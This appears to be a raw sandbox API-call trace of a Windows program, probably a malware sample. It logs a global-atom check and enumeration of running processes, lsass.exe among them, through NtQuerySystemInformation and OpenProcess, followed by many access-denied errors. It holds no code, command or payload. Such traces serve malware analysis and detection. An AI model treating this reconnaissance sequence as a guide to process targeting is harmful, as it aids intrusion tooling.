	[0132.850] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0132.851] CloseHandle (hObject=0x2dc) returned 1
	[0132.851] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0132.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0132.851] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.851] CloseHandle (hObject=0x2dc) returned 1
	[0132.851] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0132.851] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.851] CloseHandle (hObject=0x2dc) returned 1
	[0132.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0132.852] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.852] CloseHandle (hObject=0x2dc) returned 1
	[0132.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0132.852] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.852] CloseHandle (hObject=0x2dc) returned 1
	[0132.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0132.853] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0132.853] CloseHandle (hObject=0x2dc) returned 1
	[0132.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0132.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x286ff10 | out: SystemInformation=0x0, ResultLength=0x286ff10*=0x16cd8) returned 0xc0000004
	[0132.984] VirtualAlloc (lpAddress=0x0, dwSize=0x16dd8, flAllocationType=0x3000, flProtect=0x4) returned 0x3c30000
	[0132.985] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x3c30000, Length=0x16dd8, ResultLength=0x0 | out: SystemInformation=0x3c30000, ResultLength=0x0) returned 0x0
	[0133.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0133.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0133.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.028] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.028] CloseHandle (hObject=0x2dc) returned 1
	[0133.028] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.029] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.029] CloseHandle (hObject=0x2dc) returned 1
	[0133.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0133.029] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.030] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.030] CloseHandle (hObject=0x2dc) returned 1
	[0133.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.030] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.030] CloseHandle (hObject=0x2dc) returned 1
	[0133.030] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.030] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.030] CloseHandle (hObject=0x2dc) returned 1
	[0133.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.031] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.031] CloseHandle (hObject=0x2dc) returned 1
	[0133.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.031] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.031] CloseHandle (hObject=0x2dc) returned 1
	[0133.031] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.032] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.032] CloseHandle (hObject=0x2dc) returned 1
	[0133.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.032] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.032] CloseHandle (hObject=0x2dc) returned 1
	[0133.032] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.033] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.033] CloseHandle (hObject=0x2dc) returned 1
	[0133.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.033] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.033] CloseHandle (hObject=0x2dc) returned 1
	[0133.033] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.033] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.033] CloseHandle (hObject=0x2dc) returned 1
	[0133.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0133.034] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.034] CloseHandle (hObject=0x2dc) returned 1
	[0133.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0133.034] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.034] CloseHandle (hObject=0x2dc) returned 1
	[0133.034] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0133.035] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.035] CloseHandle (hObject=0x2dc) returned 1
	[0133.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.035] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.035] CloseHandle (hObject=0x2dc) returned 1
	[0133.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0133.035] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.035] CloseHandle (hObject=0x2dc) returned 1
	[0133.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0133.036] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.036] CloseHandle (hObject=0x2dc) returned 1
	[0133.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0133.036] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.036] CloseHandle (hObject=0x2dc) returned 1
	[0133.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoken-delayed.exe", cchWideChar=18, lpMultiByteStr=0x399d1a8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoken-delayed.exe", lpUsedDefaultChar=0x0) returned 18
	[0133.037] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.037] CloseHandle (hObject=0x2dc) returned 1
	[0133.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spokesman.exe", cchWideChar=13, lpMultiByteStr=0x39b5a48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spokesman.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.037] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.037] CloseHandle (hObject=0x2dc) returned 1
	[0133.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="oxide.exe", cchWideChar=9, lpMultiByteStr=0x39b5970, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="oxide.exe", lpUsedDefaultChar=0x0) returned 9
	[0133.038] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.038] CloseHandle (hObject=0x2dc) returned 1
	[0133.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="off-covered-playlist.exe", cchWideChar=24, lpMultiByteStr=0x39b9af0, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="off-covered-playlist.exe", lpUsedDefaultChar=0x0) returned 24
	[0133.038] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.038] CloseHandle (hObject=0x2dc) returned 1
	[0133.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bryant.exe", cchWideChar=10, lpMultiByteStr=0x39b5b08, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bryant.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.039] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.039] CloseHandle (hObject=0x2dc) returned 1
	[0133.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="postal-fool.exe", cchWideChar=15, lpMultiByteStr=0x39b5c10, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="postal-fool.exe", lpUsedDefaultChar=0x0) returned 15
	[0133.039] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.039] CloseHandle (hObject=0x2dc) returned 1
	[0133.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="crm_remarks_ctrl.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crm_remarks_ctrl.exe", lpUsedDefaultChar=0x0) returned 20
	[0133.039] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.039] CloseHandle (hObject=0x2dc) returned 1
	[0133.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b59e8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0133.040] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.040] CloseHandle (hObject=0x2dc) returned 1
	[0133.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d1a8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0133.040] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.040] CloseHandle (hObject=0x2dc) returned 1
	[0133.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b9af0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0133.041] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.041] CloseHandle (hObject=0x2dc) returned 1
	[0133.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0133.041] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0133.041] CloseHandle (hObject=0x2dc) returned 1
	[0133.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0133.041] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.042] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0133.043] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0133.043] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
	[0133.043] GetLastError () returned 0x5
